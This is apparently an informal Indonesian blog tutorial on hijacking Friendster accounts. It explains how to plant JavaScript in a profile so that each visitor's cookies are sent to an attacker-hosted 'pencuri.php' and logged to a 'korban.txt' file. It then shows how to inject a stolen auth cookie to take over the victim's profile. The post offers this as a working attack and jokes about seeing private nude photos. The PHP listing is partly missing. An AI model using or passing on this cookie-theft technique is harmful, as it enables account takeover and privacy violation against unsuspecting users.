by: Ari Masajaya skynet-skyzone or Skyzone
Hijacking FS
Lagi2 gw dituduh ngrusak FS temen gw, padahal gw uda males nglakuin ini gara2 dulu dimaki - maki ama temen gw, seorang cewe yg maniak bgt kayanya ama FS ( peace mba’ 
), btw lebih baik kalo kita tau tipe serangan yang bisa dilakuin di FS selain tehnik populer fake login n comment script yang biasa dipake untuk melakukan pengrusakan,,,
Tehnik hijacking, tehnik ini mungkin masih jarang digunain atau diketahui orang, tapi tenang setelah sekian lama n gw uji coba lagi ternyata cara ini udah gak seampuh dulu kok, walaupun buat yang FS nya di setting private jadi gak ada gunanya, tetap aja bisa ditembus n diliat profilenya so buat yang ada foto bugil dirinya di FS hati2 deh ckakakakakakakaka
———————————————————————————
document.location=’http://www.friendster.com/’;”;
?>
————————————————————————————
setelah itu simpan file php tersebut, lalu buat sebuah file kosong berformat txt, tempat penampungan cookies dengan nama misalkan korban.txt,
Nah sekarang upload kedua file tersebut ke webhosting kita, o ya jangan lupa untuk file korban.txt, ganti permmision nya jadi 777 atau full access,
oke kalo semua file yang dibutuhkan udah di upload kewebhosting, sekarang kita harus membuat halaman friendster kita redirect ke halaman web hosting kita, so di customize page, kita akan memasukkan kode javascript ke bagian media box, but karena sekarang FS udah gak mengijinkan lagi menginputkan script, so kita harus menggenerate kode dibawah ini di http://markyctrigger.com, gunakan OGStandard v10.4
———————————————————————————————————————–
parent.document.location=’http://webhosting/pencuri.php?kukis=’+document.cookie
———————————————————————————————————————–
oke setelah di generate kode javascript diatas, masukkan ke media box trus save, so tunggu ampe korban kita melihat FS kita, maka dia akan teralihkan kehalaman webhosting kita, dan cookies nya tersimpan di korban.txt, so tinggal pilih salah satu nama cookie dan value nya misalkan cookies profile
—————————————————————————–
friendster_profiles_auth=uid%3D1234xxxx%26lastclick%3D5021803728%26timeout%3
D1204789128%26ip_country%3DID%26country%3DID%26mac%3DYmUyM2ZiZDQ2MD
MzODUwMmVkMWQwNzY5MGFmMDMwNWY%2A
—————————————————————————–
lalu login sebagai FS kita, setelah masuk ke FS kita, inject deh cookies tersebut dengan javascript injection or bisa juga gunain add on mozilla cookie editor kalo punya, n liat profile kita, maka halaman profile kita telah menjadi halaman profile korban kita hehehehehehe silahkan cobain nama cookies dan value yang laennya hah….akhirnya selesai juga, semoga b’manfaat deh n gak bete ngliatnya coz rada kepanjangan ! 
